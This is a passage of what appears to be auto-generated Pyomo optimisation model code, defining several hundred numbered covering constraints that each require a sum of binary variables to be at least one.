m.c1737 = Constraint(expr= m.b296 + m.b318 + m.b323 >= 1)
m.c1738 = Constraint(expr= m.b296 + m.b318 + m.b321 + m.b329 >= 1)
m.c1739 = Constraint(expr= m.b296 + m.b318 + m.b321 + m.b326 + m.b330 >= 1)
m.c1740 = Constraint(expr= m.b296 + m.b318 + m.b321 + m.b325 + m.b331 >= 1)
m.c1741 = Constraint(expr= m.b296 + m.b318 + m.b321 + m.b324 >= 1)
m.c1742 = Constraint(expr= m.b296 + m.b318 + m.b320 >= 1)
m.c1743 = Constraint(expr= m.b296 + m.b317 + m.b328 >= 1)
m.c1744 = Constraint(expr= m.b296 + m.b317 + m.b326 + m.b329 >= 1)
m.c1745 = Constraint(expr= m.b296 + m.b317 + m.b325 + m.b330 >= 1)
m.c1746 = Constraint(expr= m.b296 + m.b317 + m.b324 + m.b331 >= 1)
m.c1747 = Constraint(expr= m.b296 + m.b317 + m.b323 >= 1)
m.c1748 = Constraint(expr= m.b296 + m.b317 + m.b321 + m.b330 >= 1)
m.c1749 = Constraint(expr= m.b296 + m.b317 + m.b321 + m.b326 + m.b331 >= 1)
m.c1750 = Constraint(expr= m.b296 + m.b317 + m.b321 + m.b325 >= 1)
m.c1751 = Constraint(expr= m.b296 + m.b317 + m.b320 >= 1)
m.c1752 = Constraint(expr= m.b296 + m.b316 + m.b329 >= 1)
m.c1753 = Constraint(expr= m.b296 + m.b316 + m.b326 + m.b330 >= 1)
m.c1754 = Constraint(expr= m.b296 + m.b316 + m.b325 + m.b331 >= 1)
m.c1755 = Constraint(expr= m.b296 + m.b316 + m.b324 >= 1)
m.c1756 = Constraint(expr= m.b296 + m.b316 + m.b321 + m.b331 >= 1)
m.c1757 = Constraint(expr= m.b296 + m.b316 + m.b321 + m.b326 >= 1)
m.c1758 = Constraint(expr= m.b296 + m.b316 + m.b320 >= 1)
m.c1759 = Constraint(expr= m.b296 + m.b315 + m.b330 >= 1)
m.c1760 = Constraint(expr= m.b296 + m.b315 + m.b326 + m.b331 >= 1)
m.c1761 = Constraint(expr= m.b296 + m.b315 + m.b325 >= 1)
m.c1762 = Constraint(expr= m.b296 + m.b315 + m.b321 >= 1)
m.c1763 = Constraint(expr= m.b296 + m.b314 + m.b331 >= 1)
m.c1764 = Constraint(expr= m.b296 + m.b314 + m.b326 >= 1)
m.c1765 = Constraint(expr= m.b296 + m.b314 + m.b321 >= 1)
m.c1766 = Constraint(expr= m.b296 + m.b312 + m.b328 >= 1)
m.c1767 = Constraint(expr= m.b296 + m.b312 + m.b325 + m.b329 >= 1)
m.c1768 = Constraint(expr= m.b296 + m.b312 + m.b324 + m.b330 >= 1)
m.c1769 = Constraint(expr= m.b296 + m.b312 + m.b323 >= 1)
m.c1770 = Constraint(expr= m.b296 + m.b312 + m.b321 + m.b329 >= 1)
m.c1771 = Constraint(expr= m.b296 + m.b312 + m.b321 + m.b326 + m.b330 >= 1)
m.c1772 = Constraint(expr= m.b296 + m.b312 + m.b321 + m.b325 + m.b331 >= 1)
m.c1773 = Constraint(expr= m.b296 + m.b312 + m.b321 + m.b324 >= 1)
m.c1774 = Constraint(expr= m.b296 + m.b312 + m.b320 >= 1)
m.c1775 = Constraint(expr= m.b296 + m.b312 + m.b318 + m.b328 >= 1)
m.c1776 = Constraint(expr= m.b296 + m.b312 + m.b318 + m.b326 + m.b329 >= 1)
m.c1777 = Constraint(expr= m.b296 + m.b312 + m.b318 + m.b325 + m.b330 >= 1)
m.c1778 = Constraint(expr= m.b296 + m.b312 + m.b318 + m.b324 + m.b331 >= 1)
m.c1779 = Constraint(expr= m.b296 + m.b312 + m.b318 + m.b323 >= 1)
m.c1780 = Constraint(expr= m.b296 + m.b312 + m.b318 + m.b321 + m.b330 >= 1)
m.c1781 = Constraint(expr= m.b296 + m.b312 + m.b318 + m.b321 + m.b326 + m.b331 >= 1)
m.c1782 = Constraint(expr= m.b296 + m.b312 + m.b318 + m.b321 + m.b325 >= 1)
m.c1783 = Constraint(expr= m.b296 + m.b312 + m.b318 + m.b320 >= 1)
m.c1784 = Constraint(expr= m.b296 + m.b312 + m.b317 + m.b329 >= 1)
m.c1785 = Constraint(expr= m.b296 + m.b312 + m.b317 + m.b326 + m.b330 >= 1)
m.c1786 = Constraint(expr= m.b296 + m.b312 + m.b317 + m.b325 + m.b331 >= 1)
m.c1787 = Constraint(expr= m.b296 + m.b312 + m.b317 + m.b324 >= 1)
m.c1788 = Constraint(expr= m.b296 + m.b312 + m.b317 + m.b321 + m.b331 >= 1)
m.c1789 = Constraint(expr= m.b296 + m.b312 + m.b317 + m.b321 + m.b326 >= 1)
m.c1790 = Constraint(expr= m.b296 + m.b312 + m.b317 + m.b320 >= 1)
m.c1791 = Constraint(expr= m.b296 + m.b312 + m.b316 + m.b330 >= 1)
m.c1792 = Constraint(expr= m.b296 + m.b312 + m.b316 + m.b326 + m.b331 >= 1)
m.c1793 = Constraint(expr= m.b296 + m.b312 + m.b316 + m.b325 >= 1)
m.c1794 = Constraint(expr= m.b296 + m.b312 + m.b316 + m.b321 >= 1)
m.c1795 = Constraint(expr= m.b296 + m.b312 + m.b315 + m.b331 >= 1)
m.c1796 = Constraint(expr= m.b296 + m.b312 + m.b315 + m.b326 >= 1)
m.c1797 = Constraint(expr= m.b296 + m.b312 + m.b315 + m.b321 >= 1)
m.c1798 = Constraint(expr= m.b296 + m.b312 + m.b314 + m.b331 >= 1)
m.c1799 = Constraint(expr= m.b296 + m.b312 + m.b314 + m.b326 >= 1)
m.c1800 = Constraint(expr= m.b296 + m.b312 + m.b314 + m.b321 >= 1)
m.c1801 = Constraint(expr= m.b296 + m.b311 + m.b328 >= 1)
m.c1802 = Constraint(expr= m.b296 + m.b311 + m.b326 + m.b329 >= 1)
m.c1803 = Constraint(expr= m.b296 + m.b311 + m.b325 + m.b330 >= 1)
m.c1804 = Constraint(expr= m.b296 + m.b311 + m.b324 + m.b331 >= 1)
m.c1805 = Constraint(expr= m.b296 + m.b311 + m.b323 >= 1)
m.c1806 = Constraint(expr= m.b296 + m.b311 + m.b321 + m.b330 >= 1)
m.c1807 = Constraint(expr= m.b296 + m.b311 + m.b321 + m.b326 + m.b331 >= 1)
m.c1808 = Constraint(expr= m.b296 + m.b311 + m.b321 + m.b325 >= 1)
m.c1809 = Constraint(expr= m.b296 + m.b311 + m.b320 >= 1)
m.c1810 = Constraint(expr= m.b296 + m.b311 + m.b318 + m.b329 >= 1)
m.c1811 = Constraint(expr= m.b296 + m.b311 + m.b318 + m.b326 + m.b330 >= 1)
m.c1812 = Constraint(expr= m.b296 + m.b311 + m.b318 + m.b325 + m.b331 >= 1)
m.c1813 = Constraint(expr= m.b296 + m.b311 + m.b318 + m.b324 >= 1)
m.c1814 = Constraint(expr= m.b296 + m.b311 + m.b318 + m.b321 + m.b331 >= 1)
m.c1815 = Constraint(expr= m.b296 + m.b311 + m.b318 + m.b321 + m.b326 >= 1)
m.c1816 = Constraint(expr= m.b296 + m.b311 + m.b318 + m.b320 >= 1)
m.c1817 = Constraint(expr= m.b296 + m.b311 + m.b317 + m.b330 >= 1)
m.c1818 = Constraint(expr= m.b296 + m.b311 + m.b317 + m.b326 + m.b331 >= 1)
m.c1819 = Constraint(expr= m.b296 + m.b311 + m.b317 + m.b325 >= 1)
m.c1820 = Constraint(expr= m.b296 + m.b311 + m.b317 + m.b321 >= 1)
m.c1821 = Constraint(expr= m.b296 + m.b311 + m.b316 + m.b331 >= 1)
m.c1822 = Constraint(expr= m.b296 + m.b311 + m.b316 + m.b326 >= 1)
m.c1823 = Constraint(expr= m.b296 + m.b311 + m.b316 + m.b321 >= 1)
m.c1824 = Constraint(expr= m.b296 + m.b311 + m.b315 + m.b331 >= 1)
m.c1825 = Constraint(expr= m.b296 + m.b311 + m.b315 + m.b326 >= 1)
m.c1826 = Constraint(expr= m.b296 + m.b311 + m.b315 + m.b321 >= 1)
m.c1827 = Constraint(expr= m.b296 + m.b310 + m.b329 >= 1)
m.c1828 = Constraint(expr= m.b296 + m.b310 + m.b326 + m.b330 >= 1)
m.c1829 = Constraint(expr= m.b296 + m.b310 + m.b325 + m.b331 >= 1)
m.c1830 = Constraint(expr= m.b296 + m.b310 + m.b324 >= 1)
m.c1831 = Constraint(expr= m.b296 + m.b310 + m.b321 + m.b331 >= 1)
m.c1832 = Constraint(expr= m.b296 + m.b310 + m.b321 + m.b326 >= 1)
m.c1833 = Constraint(expr= m.b296 + m.b310 + m.b320 >= 1)
m.c1834 = Constraint(expr= m.b296 + m.b310 + m.b318 + m.b330 >= 1)
m.c1835 = Constraint(expr= m.b296 + m.b310 + m.b318 + m.b326 + m.b331 >= 1)
m.c1836 = Constraint(expr= m.b296 + m.b310 + m.b318 + m.b325 >= 1)
m.c1837 = Constraint(expr= m.b296 + m.b310 + m.b318 + m.b321 >= 1)
m.c1838 = Constraint(expr= m.b296 + m.b310 + m.b317 + m.b331 >= 1)
m.c1839 = Constraint(expr= m.b296 + m.b310 + m.b317 + m.b326 >= 1)
m.c1840 = Constraint(expr= m.b296 + m.b310 + m.b317 + m.b321 >= 1)
m.c1841 = Constraint(expr= m.b296 + m.b310 + m.b316 + m.b331 >= 1)
m.c1842 = Constraint(expr= m.b296 + m.b310 + m.b316 + m.b326 >= 1)
m.c1843 = Constraint(expr= m.b296 + m.b310 + m.b316 + m.b321 >= 1)
m.c1844 = Constraint(expr= m.b296 + m.b309 + m.b330 >= 1)
m.c1845 = Constraint(expr= m.b296 + m.b309 + m.b326 + m.b331 >= 1)
m.c1846 = Constraint(expr= m.b296 + m.b309 + m.b325 >= 1)
m.c1847 = Constraint(expr= m.b296 + m.b309 + m.b321 >= 1)
m.c1848 = Constraint(expr= m.b296 + m.b309 + m.b318 + m.b331 >= 1)
m.c1849 = Constraint(expr= m.b296 + m.b309 + m.b318 + m.b326 >= 1)
m.c1850 = Constraint(expr= m.b296 + m.b309 + m.b318 + m.b321 >= 1)
m.c1851 = Constraint(expr= m.b296 + m.b309 + m.b317 + m.b331 >= 1)
m.c1852 = Constraint(expr= m.b296 + m.b309 + m.b317 + m.b326 >= 1)
m.c1853 = Constraint(expr= m.b296 + m.b309 + m.b317 + m.b321 >= 1)
m.c1854 = Constraint(expr= m.b296 + m.b308 + m.b331 >= 1)
m.c1855 = Constraint(expr= m.b296 + m.b308 + m.b326 >= 1)
m.c1856 = Constraint(expr= m.b296 + m.b308 + m.b321 >= 1)
m.c1857 = Constraint(expr= m.b296 + m.b306 + m.b328 >= 1)
m.c1858 = Constraint(expr= m.b296 + m.b306 + m.b326 + m.b329 >= 1)
m.c1859 = Constraint(expr= m.b296 + m.b306 + m.b325 + m.b330 >= 1)
m.c1860 = Constraint(expr= m.b296 + m.b306 + m.b324 + m.b331 >= 1)
m.c1861 = Constraint(expr= m.b296 + m.b306 + m.b323 >= 1)
m.c1862 = Constraint(expr= m.b296 + m.b306 + m.b321 + m.b330 >= 1)
m.c1863 = Constraint(expr= m.b296 + m.b306 + m.b321 + m.b326 + m.b331 >= 1)
m.c1864 = Constraint(expr= m.b296 + m.b306 + m.b321 + m.b325 >= 1)
m.c1865 = Constraint(expr= m.b296 + m.b306 + m.b320 >= 1)
m.c1866 = Constraint(expr= m.b296 + m.b306 + m.b318 + m.b329 >= 1)
m.c1867 = Constraint(expr= m.b296 + m.b306 + m.b318 + m.b326 + m.b330 >= 1)
m.c1868 = Constraint(expr= m.b296 + m.b306 + m.b318 + m.b325 + m.b331 >= 1)
m.c1869 = Constraint(expr= m.b296 + m.b306 + m.b318 + m.b324 >= 1)
m.c1870 = Constraint(expr= m.b296 + m.b306 + m.b318 + m.b321 + m.b331 >= 1)
m.c1871 = Constraint(expr= m.b296 + m.b306 + m.b318 + m.b321 + m.b326 >= 1)
m.c1872 = Constraint(expr= m.b296 + m.b306 + m.b318 + m.b320 >= 1)
m.c1873 = Constraint(expr= m.b296 + m.b306 + m.b317 + m.b329 >= 1)
m.c1874 = Constraint(expr= m.b296 + m.b306 + m.b317 + m.b326 + m.b330 >= 1)
m.c1875 = Constraint(expr= m.b296 + m.b306 + m.b317 + m.b325 + m.b331 >= 1)
m.c1876 = Constraint(expr= m.b296 + m.b306 + m.b317 + m.b324 >= 1)
m.c1877 = Constraint(expr= m.b296 + m.b306 + m.b317 + m.b321 + m.b331 >= 1)
m.c1878 = Constraint(expr= m.b296 + m.b306 + m.b317 + m.b321 + m.b326 >= 1)
m.c1879 = Constraint(expr= m.b296 + m.b306 + m.b317 + m.b320 >= 1)
m.c1880 = Constraint(expr= m.b296 + m.b306 + m.b316 + m.b330 >= 1)
m.c1881 = Constraint(expr= m.b296 + m.b306 + m.b316 + m.b326 + m.b331 >= 1)
m.c1882 = Constraint(expr= m.b296 + m.b306 + m.b316 + m.b325 >= 1)
m.c1883 = Constraint(expr= m.b296 + m.b306 + m.b316 + m.b321 >= 1)
m.c1884 = Constraint(expr= m.b296 + m.b306 + m.b315 + m.b331 >= 1)
m.c1885 = Constraint(expr= m.b296 + m.b306 + m.b315 + m.b326 >= 1)
m.c1886 = Constraint(expr= m.b296 + m.b306 + m.b315 + m.b321 >= 1)
m.c1887 = Constraint(expr= m.b296 + m.b306 + m.b312 + m.b329 >= 1)
m.c1888 = Constraint(expr= m.b296 + m.b306 + m.b312 + m.b326 + m.b330 >= 1)
m.c1889 = Constraint(expr= m.b296 + m.b306 + m.b312 + m.b325 + m.b331 >= 1)
m.c1890 = Constraint(expr= m.b296 + m.b306 + m.b312 + m.b324 >= 1)
m.c1891 = Constraint(expr= m.b296 + m.b306 + m.b312 + m.b321 + m.b331 >= 1)
m.c1892 = Constraint(expr= m.b296 + m.b306 + m.b312 + m.b321 + m.b326 >= 1)
m.c1893 = Constraint(expr= m.b296 + m.b306 + m.b312 + m.b320 >= 1)
m.c1894 = Constraint(expr= m.b296 + m.b306 + m.b312 + m.b318 + m.b329 >= 1)
m.c1895 = Constraint(expr= m.b296 + m.b306 + m.b312 + m.b318 + m.b326 + m.b330 >= 1)
m.c1896 = Constraint(expr= m.b296 + m.b306 + m.b312 + m.b318 + m.b325 >= 1)
m.c1897 = Constraint(expr= m.b296 + m.b306 + m.b312 + m.b318 + m.b321 >= 1)
m.c1898 = Constraint(expr= m.b296 + m.b306 + m.b312 + m.b317 + m.b330 >= 1)
m.c1899 = Constraint(expr= m.b296 + m.b306 + m.b312 + m.b317 + m.b326 + m.b331 >= 1)
m.c1900 = Constraint(expr= m.b296 + m.b306 + m.b312 + m.b317 + m.b325 >= 1)
m.c1901 = Constraint(expr= m.b296 + m.b306 + m.b312 + m.b317 + m.b321 >= 1)
m.c1902 = Constraint(expr= m.b296 + m.b306 + m.b312 + m.b316 + m.b331 >= 1)
m.c1903 = Constraint(expr= m.b296 + m.b306 + m.b312 + m.b316 + m.b326 >= 1)
m.c1904 = Constraint(expr= m.b296 + m.b306 + m.b312 + m.b316 + m.b321 >= 1)
m.c1905 = Constraint(expr= m.b296 + m.b306 + m.b311 + m.b329 >= 1)
m.c1906 = Constraint(expr= m.b296 + m.b306 + m.b311 + m.b326 + m.b330 >= 1)
m.c1907 = Constraint(expr= m.b296 + m.b306 + m.b311 + m.b325 + m.b331 >= 1)
m.c1908 = Constraint(expr= m.b296 + m.b306 + m.b311 + m.b324 >= 1)
m.c1909 = Constraint(expr= m.b296 + m.b306 + m.b311 + m.b321 + m.b331 >= 1)
m.c1910 = Constraint(expr= m.b296 + m.b306 + m.b311 + m.b321 + m.b326 >= 1)
m.c1911 = Constraint(expr= m.b296 + m.b306 + m.b311 + m.b320 >= 1)
m.c1912 = Constraint(expr= m.b296 + m.b306 + m.b311 + m.b318 + m.b330 >= 1)
m.c1913 = Constraint(expr= m.b296 + m.b306 + m.b311 + m.b318 + m.b326 + m.b331 >= 1)
m.c1914 = Constraint(expr= m.b296 + m.b306 + m.b311 + m.b318 + m.b325 >= 1)
m.c1915 = Constraint(expr= m.b296 + m.b306 + m.b311 + m.b318 + m.b321 >= 1)
m.c1916 = Constraint(expr= m.b296 + m.b306 + m.b311 + m.b317 + m.b331 >= 1)
m.c1917 = Constraint(expr= m.b296 + m.b306 + m.b311 + m.b317 + m.b326 >= 1)
m.c1918 = Constraint(expr= m.b296 + m.b306 + m.b311 + m.b317 + m.b321 >= 1)
m.c1919 = Constraint(expr= m.b296 + m.b306 + m.b310 + m.b330 >= 1)
m.c1920 = Constraint(expr= m.b296 + m.b306 + m.b310 + m.b326 + m.b331 >= 1)
m.c1921 = Constraint(expr= m.b296 + m.b306 + m.b310 + m.b325 >= 1)
m.c1922 = Constraint(expr= m.b296 + m.b306 + m.b310 + m.b321 >= 1)
m.c1923 = Constraint(expr= m.b296 + m.b306 + m.b310 + m.b318 + m.b331 >= 1)
m.c1924 = Constraint(expr= m.b296 + m.b306 + m.b310 + m.b318 + m.b326 >= 1)
m.c1925 = Constraint(expr= m.b296 + m.b306 + m.b310 + m.b318 + m.b321 >= 1)
m.c1926 = Constraint(expr= m.b296 + m.b306 + m.b309 + m.b331 >= 1)
m.c1927 = Constraint(expr= m.b296 + m.b306 + m.b309 + m.b326 >= 1)
m.c1928 = Constraint(expr= m.b296 + m.b306 + m.b309 + m.b321 >= 1)
m.c1929 = Constraint(expr= m.b296 + m.b305 + m.b329 >= 1)
m.c1930 = Constraint(expr= m.b296 + m.b305 + m.b326 + m.b330 >= 1)
m.c1931 = Constraint(expr= m.b296 + m.b305 + m.b325 + m.b331 >= 1)
m.c1932 = Constraint(expr= m.b296 + m.b305 + m.b324 >= 1)
m.c1933 = Constraint(expr= m.b296 + m.b305 + m.b321 + m.b331 >= 1)
m.c1934 = Constraint(expr= m.b296 + m.b305 + m.b321 + m.b326 >= 1)
m.c1935 = Constraint(expr= m.b296 + m.b305 + m.b320 >= 1)
m.c1936 = Constraint(expr= m.b296 + m.b305 + m.b318 + m.b330 >= 1)
m.c1937 = Constraint(expr= m.b296 + m.b305 + m.b318 + m.b326 + m.b331 >= 1)
m.c1938 = Constraint(expr= m.b296 + m.b305 + m.b318 + m.b325 >= 1)
m.c1939 = Constraint(expr= m.b296 + m.b305 + m.b318 + m.b321 >= 1)
m.c1940 = Constraint(expr= m.b296 + m.b305 + m.b317 + m.b331 >= 1)
m.c1941 = Constraint(expr= m.b296 + m.b305 + m.b317 + m.b326 >= 1)
m.c1942 = Constraint(expr= m.b296 + m.b305 + m.b317 + m.b321 >= 1)
m.c1943 = Constraint(expr= m.b296 + m.b305 + m.b312 + m.b330 >= 1)
m.c1944 = Constraint(expr= m.b296 + m.b305 + m.b312 + m.b326 + m.b331 >= 1)
m.c1945 = Constraint(expr= m.b296 + m.b305 + m.b312 + m.b325 >= 1)
m.c1946 = Constraint(expr= m.b296 + m.b305 + m.b312 + m.b321 >= 1)
m.c1947 = Constraint(expr= m.b296 + m.b305 + m.b312 + m.b318 + m.b331 >= 1)
m.c1948 = Constraint(expr= m.b296 + m.b305 + m.b312 + m.b318 + m.b326 >= 1)
m.c1949 = Constraint(expr= m.b296 + m.b305 + m.b312 + m.b318 + m.b321 >= 1)
m.c1950 = Constraint(expr= m.b296 + m.b305 + m.b311 + m.b331 >= 1)
m.c1951 = Constraint(expr= m.b296 + m.b305 + m.b311 + m.b326 >= 1)
m.c1952 = Constraint(expr= m.b296 + m.b305 + m.b311 + m.b321 >= 1)
m.c1953 = Constraint(expr= m.b296 + m.b304 + m.b331 >= 1)
m.c1954 = Constraint(expr= m.b296 + m.b304 + m.b326 >= 1)
m.c1955 = Constraint(expr= m.b296 + m.b304 + m.b321 >= 1)
m.c1956 = Constraint(expr= m.b296 + m.b304 + m.b312 + m.b331 >= 1)
m.c1957 = Constraint(expr= m.b296 + m.b304 + m.b312 + m.b326 >= 1)
m.c1958 = Constraint(expr= m.b296 + m.b304 + m.b312 + m.b321 >= 1)
m.c1959 = Constraint(expr= m.b296 + m.b302 + m.b329 >= 1)
m.c1960 = Constraint(expr= m.b296 + m.b302 + m.b325 + m.b330 >= 1)
m.c1961 = Constraint(expr= m.b296 + m.b302 + m.b324 >= 1)
m.c1962 = Constraint(expr= m.b296 + m.b302 + m.b321 + m.b330 >= 1)
m.c1963 = Constraint(expr= m.b296 + m.b302 + m.b321 + m.b326 + m.b331 >= 1)
m.c1964 = Constraint(expr= m.b296 + m.b302 + m.b321 + m.b325 >= 1)
m.c1965 = Constraint(expr= m.b296 + m.b302 + m.b320 >= 1)
m.c1966 = Constraint(expr= m.b296 + m.b302 + m.b318 + m.b329 >= 1)
m.c1967 = Constraint(expr= m.b296 + m.b302 + m.b318 + m.b326 + m.b330 >= 1)
m.c1968 = Constraint(expr= m.b296 + m.b302 + m.b318 + m.b325 + m.b331 >= 1)
m.c1969 = Constraint(expr= m.b296 + m.b302 + m.b318 + m.b324 >= 1)
m.c1970 = Constraint(expr= m.b296 + m.b302 + m.b318 + m.b321 + m.b331 >= 1)
m.c1971 = Constraint(expr= m.b296 + m.b302 + m.b318 + m.b321 + m.b326 >= 1)
m.c1972 = Constraint(expr= m.b296 + m.b302 + m.b318 + m.b320 >= 1)
m.c1973 = Constraint(expr= m.b296 + m.b302 + m.b317 + m.b330 >= 1)
m.c1974 = Constraint(expr= m.b296 + m.b302 + m.b317 + m.b326 + m.b331 >= 1)
m.c1975 = Constraint(expr= m.b296 + m.b302 + m.b317 + m.b325 >= 1)
m.c1976 = Constraint(expr= m.b296 + m.b302 + m.b317 + m.b321 >= 1)
m.c1977 = Constraint(expr= m.b296 + m.b302 + m.b316 + m.b331 >= 1)
m.c1978 = Constraint(expr= m.b296 + m.b302 + m.b316 + m.b326 >= 1)
m.c1979 = Constraint(expr= m.b296 + m.b302 + m.b316 + m.b321 >= 1)
m.c1980 = Constraint(expr= m.b296 + m.b302 + m.b312 + m.b329 >= 1)
m.c1981 = Constraint(expr= m.b296 + m.b302 + m.b312 + m.b326 + m.b330 >= 1)
m.c1982 = Constraint(expr= m.b296 + m.b302 + m.b312 + m.b325 + m.b331 >= 1)
m.c1983 = Constraint(expr= m.b296 + m.b302 + m.b312 + m.b324 >= 1)
m.c1984 = Constraint(expr= m.b296 + m.b302 + m.b312 + m.b321 + m.b331 >= 1)
m.c1985 = Constraint(expr= m.b296 + m.b302 + m.b312 + m.b321 + m.b326 >= 1)
m.c1986 = Constraint(expr= m.b296 + m.b302 + m.b312 + m.b320 >= 1)
m.c1987 = Constraint(expr= m.b296 + m.b302 + m.b312 + m.b318 + m.b330 >= 1)
m.c1988 = Constraint(expr= m.b296 + m.b302 + m.b312 + m.b318 + m.b326 + m.b331 >= 1)
m.c1989 = Constraint(expr= m.b296 + m.b302 + m.b312 + m.b318 + m.b325 >= 1)
m.c1990 = Constraint(expr= m.b296 + m.b302 + m.b312 + m.b318 + m.b321 >= 1)
m.c1991 = Constraint(expr= m.b296 + m.b302 + m.b312 + m.b317 + m.b331 >= 1)
m.c1992 = Constraint(expr= m.b296 + m.b302 + m.b312 + m.b317 + m.b326 >= 1)
m.c1993 = Constraint(expr= m.b296 + m.b302 + m.b312 + m.b317 + m.b321 >= 1)
m.c1994 = Constraint(expr= m.b296 + m.b302 + m.b311 + m.b330 >= 1)
m.c1995 = Constraint(expr= m.b296 + m.b302 + m.b311 + m.b326 + m.b331 >= 1)
m.c1996 = Constraint(expr= m.b296 + m.b302 + m.b311 + m.b325 >= 1)
m.c1997 = Constraint(expr= m.b296 + m.b302 + m.b311 + m.b321 >= 1)
m.c1998 = Constraint(expr= m.b296 + m.b302 + m.b311 + m.b318 + m.b331 >= 1)
m.c1999 = Constraint(expr= m.b296 + m.b302 + m.b311 + m.b318 + m.b326 >= 1)
m.c2000 = Constraint(expr= m.b296 + m.b302 + m.b311 + m.b318 + m.b321 >= 1)
m.c2001 = Constraint(expr= m.b296 + m.b302 + m.b310 + m.b331 >= 1)
m.c2002 = Constraint(expr= m.b296 + m.b302 + m.b310 + m.b326 >= 1)
m.c2003 = Constraint(expr= m.b296 + m.b302 + m.b310 + m.b321 >= 1)
m.c2004 = Constraint(expr= m.b296 + m.b302 + m.b306 + m.b330 >= 1)
m.c2005 = Constraint(expr= m.b296 + m.b302 + m.b306 + m.b326 + m.b331 >= 1)
m.c2006 = Constraint(expr= m.b296 + m.b302 + m.b306 + m.b325 >= 1)
m.c2007 = Constraint(expr= m.b296 + m.b302 + m.b306 + m.b321 >= 1)
m.c2008 = Constraint(expr= m.b296 + m.b302 + m.b306 + m.b318 + m.b331 >= 1)
m.c2009 = Constraint(expr= m.b296 + m.b302 + m.b306 + m.b318 + m.b326 >= 1)
m.c2010 = Constraint(expr= m.b296 + m.b302 + m.b306 + m.b318 + m.b321 >= 1)
m.c2011 = Constraint(expr= m.b296 + m.b302 + m.b306 + m.b317 + m.b331 >= 1)
m.c2012 = Constraint(expr= m.b296 + m.b302 + m.b306 + m.b317 + m.b326 >= 1)
m.c2013 = Constraint(expr= m.b296 + m.b302 + m.b306 + m.b317 + m.b321 >= 1)
m.c2014 = Constraint(expr= m.b296 + m.b302 + m.b306 + m.b312 + m.b331 >= 1)
m.c2015 = Constraint(expr= m.b296 + m.b302 + m.b306 + m.b312 + m.b326 >= 1)
m.c2016 = Constraint(expr= m.b296 + m.b302 + m.b306 + m.b312 + m.b321 >= 1)
m.c2017 = Constraint(expr= m.b296 + m.b302 + m.b306 + m.b312 + m.b318 + m.b331 >= 1)
m.c2018 = Constraint(expr= m.b296 + m.b302 + m.b306 + m.b312 + m.b318 + m.b326 >= 1)
m.c2019 = Constraint(expr= m.b296 + m.b302 + m.b306 + m.b312 + m.b318 + m.b321 >= 1)
m.c2020 = Constraint(expr= m.b296 + m.b302 + m.b306 + m.b311 + m.b331 >= 1)
m.c2021 = Constraint(expr= m.b296 + m.b302 + m.b306 + m.b311 + m.b326 >= 1)
m.c2022 = Constraint(expr= m.b296 + m.b302 + m.b306 + m.b311 + m.b321 >= 1)
m.c2023 = Constraint(expr= m.b296 + m.b302 + m.b305 + m.b331 >= 1)
m.c2024 = Constraint(expr= m.b296 + m.b302 + m.b305 + m.b326 >= 1)
m.c2025 = Constraint(expr= m.b296 + m.b302 + m.b305 + m.b321 >= 1)
m.c2026 = Constraint(expr= m.b296 + m.b301 + m.b331 >= 1)
m.c2027 = Constraint(expr= m.b296 + m.b301 + m.b326 >= 1)
m.c2028 = Constraint(expr= m.b296 + m.b301 + m.b321 >= 1)
m.c2029 = Constraint(expr= m.b296 + m.b299 + m.b329 >= 1)
m.c2030 = Constraint(expr= m.b296 + m.b299 + m.b326 + m.b330 >= 1)
m.c2031 = Constraint(expr= m.b296 + m.b299 + m.b325 + m.b331 >= 1)
m.c2032 = Constraint(expr= m.b296 + m.b299 + m.b324 >= 1)
m.c2033 = Constraint(expr= m.b296 + m.b299 + m.b321 + m.b331 >= 1)
m.c2034 = Constraint(expr= m.b296 + m.b299 + m.b321 + m.b326 >= 1)
m.c2035 = Constraint(expr= m.b296 + m.b299 + m.b320 >= 1)
m.c2036 = Constraint(expr= m.b296 + m.b299 + m.b318 + m.b330 >= 1)
m.c2037 = Constraint(expr= m.b296 + m.b299 + m.b318 + m.b326 + m.b331 >= 1)
m.c2038 = Constraint(expr= m.b296 + m.b299 + m.b318 + m.b325 >= 1)
m.c2039 = Constraint(expr= m.b296 + m.b299 + m.b318 + m.b321 >= 1)
m.c2040 = Constraint(expr= m.b296 + m.b299 + m.b317 + m.b330 >= 1)
m.c2041 = Constraint(expr= m.b296 + m.b299 + m.b317 + m.b326 + m.b331 >= 1)
m.c2042 = Constraint(expr= m.b296 + m.b299 + m.b317 + m.b325 >= 1)
m.c2043 = Constraint(expr= m.b296 + m.b299 + m.b317 + m.b321 >= 1)
m.c2044 = Constraint(expr= m.b296 + m.b299 + m.b316 + m.b331 >= 1)
m.c2045 = Constraint(expr= m.b296 + m.b299 + m.b316 + m.b326 >= 1)
m.c2046 = Constraint(expr= m.b296 + m.b299 + m.b316 + m.b321 >= 1)
m.c2047 = Constraint(expr= m.b296 + m.b299 + m.b312 + m.b330 >= 1)
m.c2048 = Constraint(expr= m.b296 + m.b299 + m.b312 + m.b326 + m.b331 >= 1)
m.c2049 = Constraint(expr= m.b296 + m.b299 + m.b312 + m.b325 >= 1)
m.c2050 = Constraint(expr= m.b296 + m.b299 + m.b312 + m.b321 >= 1)
m.c2051 = Constraint(expr= m.b296 + m.b299 + m.b312 + m.b318 + m.b330 >= 1)
m.c2052 = Constraint(expr= m.b296 + m.b299 + m.b312 + m.b318 + m.b326 + m.b331 >= 1)
m.c2053 = Constraint(expr= m.b296 + m.b299 + m.b312 + m.b318 + m.b325 >= 1)
m.c2054 = Constraint(expr= m.b296 + m.b299 + m.b312 + m.b318 + m.b321 >= 1)
m.c2055 = Constraint(expr= m.b296 + m.b299 + m.b312 + m.b317 + m.b331 >= 1)
m.c2056 = Constraint(expr= m.b296 + m.b299 + m.b312 + m.b317 + m.b326 >= 1)
m.c2057 = Constraint(expr= m.b296 + m.b299 + m.b312 + m.b317 + m.b321 >= 1)
m.c2058 = Constraint(expr= m.b296 + m.b299 + m.b311 + m.b330 >= 1)
m.c2059 = Constraint(expr= m.b296 + m.b299 + m.b311 + m.b326 + m.b331 >= 1)
m.c2060 = Constraint(expr= m.b296 + m.b299 + m.b311 + m.b325 >= 1)
m.c2061 = Constraint(expr= m.b296 + m.b299 + m.b311 + m.b321 >= 1)
m.c2062 = Constraint(expr= m.b296 + m.b299 + m.b311 + m.b318 + m.b331 >= 1)
m.c2063 = Constraint(expr= m.b296 + m.b299 + m.b311 + m.b318 + m.b326 >= 1)
m.c2064 = Constraint(expr= m.b296 + m.b299 + m.b311 + m.b318 + m.b321 >= 1)
m.c2065 = Constraint(expr= m.b296 + m.b299 + m.b310 + m.b331 >= 1)
